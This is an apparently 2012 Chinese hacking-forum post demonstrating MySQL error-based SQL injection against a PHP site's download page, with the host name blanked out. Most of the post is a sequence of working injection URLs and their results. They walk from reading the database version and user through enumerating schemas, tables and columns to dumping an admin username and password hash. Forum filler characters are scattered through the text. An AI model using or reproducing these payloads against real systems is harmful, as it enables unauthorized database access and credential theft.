找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2065|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666( m, X2 V+ i/ P) ]% \! o1 Z
8 ?! i- P$ E. E/ o3 L$ e8 r
之前想找个测试 没想到这有 可以测试下做个记录而已 * y$ e, ]6 i( R% J  s

6 D+ Q+ @% `$ uhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003, ~% v7 a# J7 [; ^0 P

$ q4 a$ r3 \: h. v& K! ~( H/data0/htdocs/leqi_new/app/myapp.php! Z" E) }. I1 r' i# V
* s4 f, F& L8 B- i9 R4 z, q
或者
5 A1 @# X0 A% M7 V, N1 s& b! b
3 o" A' x$ ]% o7 E$ D1 }6 D/**********version()**********/ 5.1.49-log
  T/ i. t* x+ h' E$ |# x) P' ]8 Shttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003; A8 ]0 b" r! Y$ [# l, E; a
" @* J4 ^3 M# W8 S/ N1 `
/**********user()**********/  6 v. l. a( ]5 Q
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003; i0 Q8 z* c; ^7 M
5 U9 r+ @. G6 H# P# ^3 h/ {
/**********database()**********/  leqi
9 U4 j- J; i- @. bhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
2 P7 @; B+ {. `5 a! y, k# @2 o1 U1 `; ^
/**********limit依次递归爆库**********/8 s* b* G" n9 B# b  O' j- }6 O
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003* @1 v$ b) Q8 |* h
information_schema
, |& q# u. |1 I: G3 yhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003/ {6 y) F# N- K, [% O8 y5 G' p$ j
leqi
) y. p9 n+ `; d' S6 a) E9 Chttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
1 V  W3 U% ]& ]/ ttest
4 q  p& e+ m' \: t$ ^6 R; U$ C) L( P; p. z* q
/**********limit依次递归爆表名**********/$ a) Q2 q: G2 I# ]8 Q; t
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) R9 ?, |% Z# m1 F7 d/ o# W, A1 _0 A
users
: P& d) T9 A2 Y% ?5 k" J9 D/ R: m* G3 N  p3 H( [
/**********limit依次递归爆字段名**********/
& e. k4 z& ]+ X6 m2 X2 Thttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0032 }9 U7 b# _9 }" @9 i+ o7 h( b) F
user_id,username,nickname,passwd,group_id" n6 H6 j; k/ H( ^5 U' I/ l
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
: m$ |  K0 n) b/ V, @; {/wapc/5000_0005_003
0 b7 ?' L% K: r' H11 21
% e7 X5 S# v/ C# N# I# thttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
, f2 ^' y- L2 L; g' C$ ?4 R* Z8 C/wapc/5000_0005_003
! W6 g+ B" I0 r' S4 b11 341 351 361
0 N* y' m+ N9 `' b3 U! Q/ v3 q/**********爆数据**********/
6 z2 U8 R7 k/ ]) @http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23- E+ K3 b" ]% k% @4 h9 D& k9 [
admin
" t( c2 O6 Z' b5 I$ ]0 ghttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23, S( f3 ?$ m1 d% f3 M
6a8b4574ca231eb8bd52764d4978ffcd+ K8 A8 L& E# g2 ]
% P! s& o3 x& q8 ~& N& t* T
# X5 I+ C2 h) ]* [2 n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表